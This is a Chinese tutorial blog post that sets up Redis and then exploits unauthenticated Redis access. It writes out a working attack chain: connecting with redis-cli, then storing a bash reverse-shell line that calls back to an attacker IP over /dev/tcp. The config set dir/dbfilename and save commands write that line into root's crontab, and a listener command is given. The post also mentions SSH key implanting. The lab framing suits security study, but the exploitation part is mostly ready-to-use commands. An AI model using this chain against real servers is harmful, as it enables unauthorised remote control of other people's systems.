Redis未授权访问漏洞利用

redis环境搭建

1.首先将我们所用到的文件上传到服务器并解压

在这里插入图片描述

2.进入redis文件夹 使用 make 命令编译 如果报错gcc未找到就使用yum命令安装一下gcc: yum -y install gcc

在这里插入图片描述

3.进入redis下的src文件夹 有redis.server证明安装成功 使./redis.service

启动redis
在这里插入图片描述

4.链接redis话再打开一个终端进入redis下src目录使用./redis.cli就可以进行链接

在这里插入图片描述

5.为了方便使用可以将redis-cli复制到/usr/local/bin目录下,这样就可以在任意位置使用redis-cli来连接

在这里插入图片描述

redis未授权访问漏洞

Redis因配置不当可以未授权访问。攻击者无需认证访问到内部数据可导致敏感信息泄露,也可以恶意执行flushall来清空所以数据。攻击者可通过eval执行LUA代码,或通过数据备份功能往磁盘写入后门文件如果redis以root身份运行可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。

1.当服务器安装完redis后没有设置密码这时候就存在redis未授权漏洞
我们可以使用另一台有reids服务器进行连接
示例:我们centos服务器是搭建了redis并且没设置密码,然后我们使用安装了redis服务的kali服务器进行连接

redis-cli -h 192.168.1.19 -p 6379

在这里插入图片描述

redis未授权漏洞利用

写入计划任务反弹shell

set x "\n* * * * * /bin/bash -i > /dev/tcp/192.168.1.9/6666 0<&1 2>&1\n"

以上命令就是写入计划任务反弹shell,ip设置为攻击机的ip 端口自定,每分钟执行一次。
config set dir /var/spool/cron/ 设置路径

config set dbfilename root  设置以root身份执行
save   保存

在这里插入图片描述以上完成后在攻击机开启一个监听 拿到权限可以控制服务器。

nv -lvp 6666

在这里插入图片描述

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

制冷少年的成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值